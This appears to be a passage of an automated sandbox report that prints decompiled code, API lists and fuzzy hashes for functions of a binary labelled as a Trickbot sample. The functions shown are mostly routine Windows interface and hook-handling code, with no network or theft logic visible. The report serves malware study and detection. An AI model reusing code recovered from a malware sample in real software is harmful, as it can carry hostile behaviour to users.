                          						if(_v4 == 0x29a) {
                          							_t13 = SendMessageA(_t25, 0x1943, 0, _t21);
                          							__eflags = _v4 - 0x29a;
                          							if(_v4 == 0x29a) {
                          								__eflags = 0;
                          								RemovePropA(_t25, 0);
                          								_push(_a12);
                          								_push(0);
                          								_push(_a8);
                          								_push(_t25);
                          								return E004121F0(__eflags);
                          							}
                          						}
                          					}
                          					return _t13;
                          				} else {
                          					_push(_a12);
                          					_push(0);
                          					_push(_a8);
                          					_push(_t25);
                          					return E004121F0(_t31);
                          				}
                          			}


                          APIs
                          • GetPropA.USER32(?,00000000), ref: 0041111D
                          • SendMessageA.USER32(?,00001944,00000000,?), ref: 00411142
                          • SendMessageA.USER32(?,00001943,00000000,?), ref: 00411157
                          • RemovePropA.USER32(?,00000000), ref: 0041116D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MessagePropSend$Remove
                          • String ID:
                          • API String ID: 2793251306-0
                          • Opcode ID: 9d783b7f87efe0456fc6f475102cabf6c5e08732b00771f79e8cee98ac825063
                          • Instruction ID: e6d172cf423bcb528c6391416559a19d0f1cacbd843c27cbae755e5c50842972
                          • Opcode Fuzzy Hash: 9d783b7f87efe0456fc6f475102cabf6c5e08732b00771f79e8cee98ac825063
                          • Instruction Fuzzy Hash: A51177795402107EE201AB10AC45FFB739CEB89765F044429FE1492251E37C9D8A8BAF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0043507D(void* __ecx) {
                          				CHAR* _t35;
                          				void* _t40;
                          				CHAR* _t49;
                          				CHAR* _t55;
                          				signed int _t56;
                          				void* _t61;
                          
                          				E00405340(E00437C14, _t61);
                          				_t49 =  *(_t61 + 8);
                          				_t55 =  *(_t61 + 0xc);
                          				 *(_t61 + 0xc) =  &(_t49[_t55 - 1]);
                          				 *((intOrPtr*)(_t61 - 0x10)) =  *((intOrPtr*)(E0041C00C() + 0x1c));
                          				_t56 = 0 | _t55 != 0x00000001;
                          				_t35 =  *0x447478; // 0x44748c
                          				 *(_t61 + 8) = _t35;
                          				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
                          				if(E0041C729(_t61 + 8,  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x114)) + 0x1c)), _t56, 0xa) != 0) {
                          					if(_t56 != 0) {
                          						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49,  *(_t61 + 0xc));
                          					} else {
                          						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49);
                          					}
                          					SendMessageA( *( *((intOrPtr*)(_t61 - 0x10)) + 0x1c), 0x362, 0, _t61 - 0x60);
                          				}
                          				 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
                          				_t40 = E00417EC8(_t61 + 8);
                          				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
                          				return _t40;
                          			}


                          APIs
                          • __EH_prolog.LIBCMT ref: 00435082
                            • Part of subcall function 0041C729: lstrlenA.KERNEL32(?), ref: 0041C76D
                          • wsprintfA.USER32 ref: 004350E3
                          • wsprintfA.USER32 ref: 004350F9
                          • SendMessageA.USER32(?,00000362,00000000,?), ref: 00435113
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: wsprintf$H_prologMessageSendlstrlen
                          • String ID:
                          • API String ID: 443212507-0
                          • Opcode ID: 7568dc1891dc1f9f5f28723849bcb0ad32ad2c1ea288e8933e7830568249f652
                          • Instruction ID: 3896952cd2ac3589815e7203ab989da825ee935fbd18f32ef7b3df015077bb18
                          • Opcode Fuzzy Hash: 7568dc1891dc1f9f5f28723849bcb0ad32ad2c1ea288e8933e7830568249f652
                          • Instruction Fuzzy Hash: 5A214D76900209AFCB01DFA4CC85ADEBBB9FB48364F008526F919DB251D774EA45CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E0042A062(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                          				int _v8;
                          				int _t21;
                          				intOrPtr _t32;
                          				int _t36;
                          				void* _t46;
                          
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t46 = __ecx;
                          				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
                          				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
                          				_v8 = _t21;
                          				OffsetRect(__ecx + 0x28, _t36, _t21);
                          				OffsetRect(_t46 + 0x48, _t36, _v8);
                          				OffsetRect(_t46 + 0x38, _t36, _v8);
                          				OffsetRect(_t46 + 0x58, _t36, _v8);
                          				_t48 =  *((intOrPtr*)(_t46 + 0x80));
                          				 *((intOrPtr*)(_t46 + 4)) = _a4;
                          				 *((intOrPtr*)(_t46 + 8)) = _a8;
                          				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
                          					_t32 = E0042A860();
                          				} else {
                          					_t32 = 0;
                          				}
                          				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
                          				return E0042A6F8(_t46, _t48, 0);
                          			}


                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: OffsetRect
                          • String ID:
                          • API String ID: 177026234-0
                          • Opcode ID: e3ae6aedc4fbeb52492e3ab1b6ffacc3472f3efdf2bf331ad067950e5a5bf1c0
                          • Instruction ID: d1daf5c72706f8fcfc3b771992623bfbebea344b7a9b586fa9b4d752f20692b1
                          • Opcode Fuzzy Hash: e3ae6aedc4fbeb52492e3ab1b6ffacc3472f3efdf2bf331ad067950e5a5bf1c0
                          • Instruction Fuzzy Hash: 9A113C71600609AFDB10EFAAC884D9BB7ECEF44344B00482EF54AC3610DA74FD408B64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 73%
                          			E0042F48D(void* __ecx) {
                          				void* __ebp;
                          				void* _t6;
                          				void* _t8;
                          				void* _t27;
                          				void* _t30;
                          				void* _t32;
                          
                          				_t32 = __ecx;
                          				_t6 = E004187B4(__ecx);
                          				if(_t6 != 0) {
                          					if((E0041B66F(_t32) & 0x00000001) != 0) {
                          						_t27 = E00419DFD(_t32);
                          						_t30 = E0041884D(_t32, GetForegroundWindow());
                          						if(_t27 == _t30 || E0041884D(_t32, GetLastActivePopup( *(_t27 + 0x1c))) == _t30 && SendMessageA( *(_t30 + 0x1c), 0x36d, 0x40, 0) != 0) {
                          							_push(1);
                          							_pop(0);
                          						}
                          						asm("sbb eax, eax");
                          						SendMessageA( *(_t32 + 0x1c), 0x36d, 0xb4, 0);
                          					}
                          					_t8 = 1;
                          					return _t8;
                          				}
                          				return _t6;
                          			}

                          Instruction addresses of the decompiled lines above: 0x0042f48e 0x0042f490 0x0042f497 0x0042f4a3 0x0042f4af 0x0042f4c3 0x0042f4c7 0x0042f4f2 0x0042f4f4 0x0042f4f4 0x0042f4f7 0x0042f509 0x0042f50d 0x0042f510 0x00000000 0x0042f510 0x0042f512

                          APIs
                            • Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B
                          • GetForegroundWindow.USER32 ref: 0042F4B1
                          • GetLastActivePopup.USER32(?), ref: 0042F4CC
                          • SendMessageA.USER32(?,0000036D,00000040,00000000), ref: 0042F4E8
                          • SendMessageA.USER32(?,0000036D,-00000007,00000000), ref: 0042F509
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MessageSendWindow$ActiveForegroundLastLongPopup
                          • String ID:
                          • API String ID: 2039223353-0
                          • Opcode ID: 91869999d8780f430f8a3ccff6f9b1c8eca4c61e26f4fe0d02049a032d7895a2
                          • Instruction ID: fa251ff15269e0c7298ac5f7e8a3aaf9f3b83de26abc48cab7713d1af1bed98b
                          • Opcode Fuzzy Hash: 91869999d8780f430f8a3ccff6f9b1c8eca4c61e26f4fe0d02049a032d7895a2
                          • Instruction Fuzzy Hash: 1501F2327803257BEB213E75AC46FAB22299B60750FA0453ABA01D62D1D9E9DC85415C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00411191(void* __eax, void* __ebx, void* __edx, struct HWND__* _a12, intOrPtr _a16) {
                          				struct HWND__* _t17;
                          				struct HWND__* _t21;
                          				intOrPtr _t25;
                          				void* _t31;
                          
                          				_t1 = __ebx + 0x56;
                          				 *_t1 =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
                          				if( *_t1 != 0) {
                          					_t21 = GetWindow(_a12, 5);
                          					__eflags = _t21;
                          					if(__eflags != 0) {
                          						_t25 = _a16;
                          						do {
                          							E004110E0(__eflags, _t21, _t25, 0);
                          							_t31 = _t31 + 0xc;
                          							_t17 = GetWindow(_t21, 5);
                          							__eflags = _t17;
                          							while(__eflags != 0) {
                          								E004110E0(__eflags, _t17, _t25, _t21);
                          								_t31 = _t31 + 0xc;
                          								_t17 = GetWindow(_t17, 2);
                          								__eflags = _t17;
                          							}
                          							_t21 = GetWindow(_t21, 2);
                          							__eflags = _t21;
                          						} while (__eflags != 0);
                          					}
                          					return 1;
                          				} else {
                          					return 0;
                          				}
                          			}

                          Instruction addresses of the decompiled lines above: 0x00411196 0x00411196 0x0041119b 0x004111b5 0x004111b7 0x004111b9 0x004111bb 0x004111c0 0x004111c4 0x004111c9 0x004111d1 0x004111d3 0x004111d5 0x004111da 0x004111df 0x004111e7 0x004111e9 0x004111e9 0x004111f2 0x004111f4 0x004111f4 0x004111c0 0x00411201 0x0041119d 0x004111a3 0x004111a3

                          APIs
                          • GetWindow.USER32(?,00000005), ref: 004111B3
                          • GetWindow.USER32(00000000,00000005), ref: 004111CF
                          • GetWindow.USER32(00000000,00000002), ref: 004111E5
                          • GetWindow.USER32(00000000,00000002), ref: 004111F0
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window
                          • String ID:
                          • API String ID: 2353593579-0
                          • Opcode ID: ba5edc726217d0f55e6b6351d0a90b9943e9f5060299240123e9aa43c5f549d8
                          • Instruction ID: a1ed8345b0a64d0b6a3fba31b0051199d143df140da30347aa5d34f979e11ae7
                          • Opcode Fuzzy Hash: ba5edc726217d0f55e6b6351d0a90b9943e9f5060299240123e9aa43c5f549d8
                          • Instruction Fuzzy Hash: 18F0F93730134132D22163AE2CC6FABBB988BD5B91F00003BF70096252ED59D8454229
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00411281(void* __eax, void* __edx, void* __esi, signed char _a8, struct HDC__* _a13, struct HWND__* _a17) {
                          				signed char _t7;
                          				signed char _t8;
                          				long _t10;
                          				intOrPtr _t13;
                          				long _t18;
                          				struct HDC__* _t22;
                          				struct HWND__* _t25;
                          
                          				_t1 = __esi + 0x74;
                          				 *_t1 =  *((intOrPtr*)(__esi + 0x74)) + __edx;
                          				if( *_t1 < 0) {
                          					L10:
                          					return 0;
                          				} else {
                          					_t7 = _a8;
                          					_t8 = _t7 & 0x00000008;
                          					if(_t8 < 0x134 || _t8 == 0x137) {
                          						goto L10;
                          					} else {
                          						if(_t8 != 0x134) {
                          							L9:
                          							_t22 = _a13;
                          							_t10 =  *0x44d370; // 0x0
                          							SetTextColor(_t22, _t10);
                          							_t18 =  *0x44d368; // 0x0
                          							SetBkColor(_t22, _t18);
                          							_t13 =  *0x44d388; // 0x0
                          							return _t13;
                          						} else {
                          							if( *0x44d360 >= 0x35f) {
                          								L8:
                          								return 0;
                          							} else {
                          								_t25 = _a17;
                          								if(GetWindow(_t25, 5) == 0 || (GetWindowLongA(_t25, 0xfffffff0) & 0x00000003) == 3) {
                          									goto L8;
                          								} else {
                          									goto L9;
                          								}
                          							}
                          						}
                          					}
                          				}
                          			}

                          Instruction addresses of the decompiled lines above: 0x00411286 0x00411286 0x00411289 0x004112fc 0x004112ff 0x0041128a 0x0041128a 0x0041128c 0x00411293 0x00000000 0x0041129c 0x004112a1 0x004112d4 0x004112d4 0x004112d8 0x004112df 0x004112e5 0x004112ed 0x004112f3 0x004112f9 0x004112a3 0x004112ac 0x004112ce 0x004112d1 0x004112ae 0x004112ae 0x004112bd 0x00000000 0x00000000 0x00000000 0x00000000 0x004112bd 0x004112ac 0x004112a1 0x00411293

                          APIs
                          • GetWindow.USER32(?,00000005), ref: 004112B5
                          • GetWindowLongA.USER32(?,000000F0), ref: 004112C2
                          • SetTextColor.GDI32(?,00000000), ref: 004112DF
                          • SetBkColor.GDI32(?,00000000), ref: 004112ED
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ColorWindow$LongText
                          • String ID:
                          • API String ID: 3945788684-0
                          • Opcode ID: 856346d837d2dd4a79e5d931d0b60ab9acd63712bb04a2470286c14b49f0b745
                          • Instruction ID: c4c87754b4dc18ecada0eef6f772d8b29d996c253931acdfc0ab491aeddbeba9
                          • Opcode Fuzzy Hash: 856346d837d2dd4a79e5d931d0b60ab9acd63712bb04a2470286c14b49f0b745
                          • Instruction Fuzzy Hash: 7401D83A6092505BDF20DB64BC48DDB7754E792321F044867FA41E31A0D2789DC2C76E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00410750(int _a4, int _a8, long _a12) {
                          				void* _v4;
                          				struct HHOOK__* _t17;
                          				long _t22;
                          				signed char _t25;
                          				intOrPtr _t27;
                          				struct HHOOK__* _t30;
                          				long _t31;
                          				long _t32;
                          
                          				_t32 = _a12;
                          				_t30 =  *0x44bf58; // 0x0
                          				_t31 = CallNextHookEx(_t30, _a4, _a8, _t32);
                          				_t27 =  *0x44bf54; // 0x0
                          				if( *(_t32 + 0xc) == _t27) {
                          					_t17 =  *0x44bf58; // 0x0
                          					UnhookWindowsHookEx(_t17);
                          					if( *0x44d360 < 0x35f) {
                          						L3:
                          						_v4 = 1;
                          					} else {
                          						_t25 = GetWindowLongA( *(_t32 + 0xc), 0xfffffff0);
                          						_v4 = 0;
                          						if((_t25 & 0x00000004) == 0) {
                          							goto L3;
                          						}
                          					}
                          					SendMessageA( *(_t32 + 0xc), 0x11f0, 0,  &_v4);
                          					if(_v4 != 0) {
                          						_t22 =  *0x44bf5c; // 0x0
                          						E00410660( *(_t32 + 0xc), _t22);
                          					}
                          					 *0x44bf58 = 0;
                          					 *0x44bf5c = 0;
                          					 *0x44bf54 = 0;
                          				}
                          				return _t31;
                          			}

                          Instruction addresses of the decompiled lines above: 0x0041075c 0x00410762 0x00410771 0x00410773 0x0041077c 0x0041077e 0x00410784 0x00410793 0x004107ad 0x004107ad 0x00410795 0x0041079b 0x004107a1 0x004107ab 0x00000000 0x00000000 0x004107ab 0x004107c5 0x004107d0 0x004107d2 0x004107dc 0x004107e1 0x004107e6 0x004107eb 0x004107f0 0x004107f0 0x004107fc

                          APIs
                          • CallNextHookEx.USER32(00000000,?,?,?), ref: 0041076B
                          • UnhookWindowsHookEx.USER32(00000000), ref: 00410784
                          • GetWindowLongA.USER32(?,000000F0), ref: 0041079B
                          • SendMessageA.USER32(00000001,000011F0,00000000,00000001), ref: 004107C5
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Hook$CallLongMessageNextSendUnhookWindowWindows
                          • String ID:
                          • API String ID: 4187046592-0
                          • Opcode ID: 5c38c5d8350f127c78e6d3fc206875fa89dc638ff6e3960a1954e697a0466d40
                          • Instruction ID: d95107affab85109cb248e79544b7e60c9bb29929d57d32e8df17cec5c86c39f
                          • Opcode Fuzzy Hash: 5c38c5d8350f127c78e6d3fc206875fa89dc638ff6e3960a1954e697a0466d40
                          • Instruction Fuzzy Hash: C111E979600240AFD714DF58EC48E9777E9EB89315F008929F55AC32A1D774E888CF59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E00426C1E(void* __ecx, int _a4, long _a8, signed int _a12) {
                          				int _v8;
                          				int _t26;
                          				void* _t37;
                          				void* _t44;
                          				signed int _t47;
                          
                          				_push(__ecx);
                          				_t47 = _a12;
                          				_t37 = __ecx;
                          				_t44 = (GetDlgCtrlID( *(_t47 + 0x1c)) & 0x0000ffff) - 0xea00;
                          				_t26 = GetScrollPos( *(_t47 + 0x1c), 2);
                          				_a12 = _a12 & 0x00000000;
                          				_v8 = _t26;
                          				if( *((intOrPtr*)(_t37 + 0x68)) > 0) {
                          					_a4 = (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff;
                          					do {
                          						_a8 =  *(_t47 + 0x1c);
                          						SendMessageA( *(E00424B00(_t37, _a12, _t44) + 0x1c), 0x114, _a4, _a8);
                          						if(_a12 <  *((intOrPtr*)(_t37 + 0x68)) - 1) {
                          							SetScrollPos( *(_t47 + 0x1c), 2, _v8, 0);
                          						}
                          						_a12 = _a12 + 1;
                          						_t26 = _a12;
                          					} while (_t26 <  *((intOrPtr*)(_t37 + 0x68)));
                          				}
                          				return _t26;
                          			}

                          Instruction addresses of the decompiled lines above: 0x00426c21 0x00426c24 0x00426c28 0x00426c38 0x00426c41 0x00426c47 0x00426c4f 0x00426c52 0x00426c61 0x00426c64 0x00426c6d 0x00426c83 0x00426c90 0x00426c9c 0x00426c9c 0x00426ca2 0x00426ca5 0x00426ca8 0x00426c64 0x00426cb1

                          APIs
                          • GetDlgCtrlID.USER32(?), ref: 00426C2D
                          • GetScrollPos.USER32(?,00000002), ref: 00426C41
                          • SendMessageA.USER32(?,00000114,?,?), ref: 00426C83
                          • SetScrollPos.USER32(?,00000002,?,00000000), ref: 00426C9C
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Scroll$CtrlMessageSend
                          • String ID:
                          • API String ID: 1219558039-0
                          • Opcode ID: fd45872da83502ac7f8d07f8c40266ad8097cdbb7f3251700dac79eb9b793975
                          • Instruction ID: c1eba77a85b1963741d145194148ccc4b3183374c85a73932b5aad2aa483d95e
                          • Opcode Fuzzy Hash: fd45872da83502ac7f8d07f8c40266ad8097cdbb7f3251700dac79eb9b793975
                          • Instruction Fuzzy Hash: BE115E31200358FFDF119F55EC89EAA7BB5FB44701F10882AF951962A1C3B4ED51DBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E00426CB4(void* __ecx, int _a4, long _a8, signed int _a12) {
                          				int _v8;
                          				int _t26;
                          				void* _t37;
                          				void* _t44;
                          				signed int _t47;
                          
                          				_push(__ecx);
                          				_t47 = _a12;
                          				_t37 = __ecx;
                          				_t44 = (GetDlgCtrlID( *(_t47 + 0x1c)) & 0x0000ffff) - 0xea10;
                          				_t26 = GetScrollPos( *(_t47 + 0x1c), 2);
                          				_a12 = _a12 & 0x00000000;
                          				_v8 = _t26;
                          				if( *((intOrPtr*)(_t37 + 0x6c)) > 0) {
                          					_a4 = (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff;
                          					do {
                          						_a8 =  *(_t47 + 0x1c);
                          						SendMessageA( *(E00424B00(_t37, _t44, _a12) + 0x1c), 0x115, _a4, _a8);
                          						if(_a12 <  *((intOrPtr*)(_t37 + 0x6c)) - 1) {
                          							SetScrollPos( *(_t47 + 0x1c), 2, _v8, 0);
                          						}
                          						_a12 = _a12 + 1;
                          						_t26 = _a12;
                          					} while (_t26 <  *((intOrPtr*)(_t37 + 0x6c)));
                          				}
                          				return _t26;
                          			}

                          Instruction addresses of the decompiled lines above: 0x00426cb7 0x00426cba 0x00426cbe 0x00426cce 0x00426cd7 0x00426cdd 0x00426ce5 0x00426ce8 0x00426cf7 0x00426cfa 0x00426d02 0x00426d19 0x00426d26 0x00426d32 0x00426d32 0x00426d38 0x00426d3b 0x00426d3e 0x00426cfa 0x00426d47

                          APIs
                          • GetDlgCtrlID.USER32(?), ref: 00426CC3
                          • GetScrollPos.USER32(?,00000002), ref: 00426CD7
                          • SendMessageA.USER32(?,00000115,?,?), ref: 00426D19
                          • SetScrollPos.USER32(?,00000002,?,00000000), ref: 00426D32
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Scroll$CtrlMessageSend
                          • String ID:
                          • API String ID: 1219558039-0
                          • Opcode ID: 6f5a605fe724b9b604ad3f0b4f84caa6a12a91c39a123ba14cc55f0d973fd5d8
                          • Instruction ID: 5af3aef83dc0c919a6942dd2bd4520737546826c62a0ce3e496867c393cc44ba
                          • Opcode Fuzzy Hash: 6f5a605fe724b9b604ad3f0b4f84caa6a12a91c39a123ba14cc55f0d973fd5d8
                          • Instruction Fuzzy Hash: 8F114F31200218FFDF119F15EC45AAA7BB5FB44305F10842AFD02962A1D3B5DD61DB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E0041D093(void* __ecx, void* __esi) {
                          				void* _v8;
                          				void* __ebp;
                          				void* _t10;
                          				void* _t22;
                          				intOrPtr* _t29;
                          				void* _t31;
                          				void* _t34;
                          
                          				_t31 = __esi;
                          				_push(__ecx);
                          				_t22 = __ecx;
                          				if(E0041BDEB(0x10) == 0) {
                          					_t29 = 0;
                          				} else {
                          					_t29 = E0041D02C(_t8, 0xffffffff);
                          				}
                          				_push(_t31);
                          				_t10 = GetCurrentProcess();
                          				if(DuplicateHandle(GetCurrentProcess(),  *(_t22 + 4), _t10,  &_v8, 0, 0, 2) == 0) {
                          					if(_t29 != 0) {
                          						 *((intOrPtr*)( *_t29 + 4))(1);
                          					}
                          					E0041DA99(_t34, GetLastError(), 0);
                          				}
                          				 *((intOrPtr*)(_t29 + 4)) = _v8;
                          				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t22 + 8));
                          				return _t29;
                          			}

                          Instruction addresses of the decompiled lines above: 0x0041d093 0x0041d096 0x0041d099 0x0041d0a5 0x0041d0b4 0x0041d0a7 0x0041d0b0 0x0041d0b0 0x0041d0b6 0x0041d0c7 0x0041d0d9 0x0041d0dd 0x0041d0e5 0x0041d0e5 0x0041d0f1 0x0041d0f1 0x0041d0f9 0x0041d0ff 0x0041d107

                          APIs
                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 0041D0C7
                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 0041D0CD
                          • DuplicateHandle.KERNEL32(00000000), ref: 0041D0D0
                          • GetLastError.KERNEL32(00000000), ref: 0041D0EA
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CurrentProcess$DuplicateErrorHandleLast
                          • String ID:
                          • API String ID: 3907606552-0
                          • Opcode ID: e564f38fb1a09cf8282d13b77620846182e222f32d028b61ed53b63ccbc38c11
                          • Instruction ID: 941c6dec626f15ba49ee508ca998af64c5d12853038e6dca728117834027dfe1
                          • Opcode Fuzzy Hash: e564f38fb1a09cf8282d13b77620846182e222f32d028b61ed53b63ccbc38c11
                          • Instruction Fuzzy Hash: 610184B5B04200BBEB109BA69C49F9B7B99DF88714F104526FA05CB2C1DAB4DC418768
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00410C30() {
                          				signed int _t18;
                          				intOrPtr _t20;
                          				void* _t24;
                          				long _t26;
                          				void* _t29;
                          				void* _t32;
                          				signed int _t34;
                          				void* _t35;
                          				void* _t36;
                          				void* _t40;
                          				void* _t41;
                          				void* _t42;
                          
                          				_t34 = 0;
                          				_t26 = GetCurrentThreadId();
                          				EnterCriticalSection(0x44d320);
                          				_t36 =  *0x44d39c - _t34; // 0x0
                          				if(_t36 > 0) {
                          					do {
                          						_t18 = _t34 * 4;
                          						_t32 = _t18 + _t18 * 4;
                          						if( *((intOrPtr*)(_t18 + 0x44d3a4 + _t18 * 4)) == _t26) {
                          							_t20 =  *((intOrPtr*)(_t32 + 0x44d3ac)) - 1;
                          							 *((intOrPtr*)(_t32 + 0x44d3ac)) = _t20;
                          							if(_t20 == 0 ||  *(_t32 + 0x44d3a0) ==  *((intOrPtr*)(_t35 + 0x14))) {
                          								UnhookWindowsHookEx( *(_t32 + 0x44d3a8));
                          								 *0x44d39c =  *0x44d39c - 1;
                          								_t40 = _t34 -  *0x44d39c; // 0x0
                          								if(_t40 < 0) {
                          									_t29 = _t32 + 0x44d3a0;
                          									do {
                          										_t34 = _t34 + 1;
                          										_t24 = memcpy(_t29, _t29 + 0x14, 5 << 2);
                          										_t35 = _t35 + 0xc;
                          										_t29 = _t24;
                          										_t41 = _t34 -  *0x44d39c; // 0x0
                          									} while (_t41 < 0);
                          								}
                          							}
                          						}
                          						_t34 = _t34 + 1;
                          						_t42 = _t34 -  *0x44d39c; // 0x0
                          					} while (_t42 < 0);
                          				}
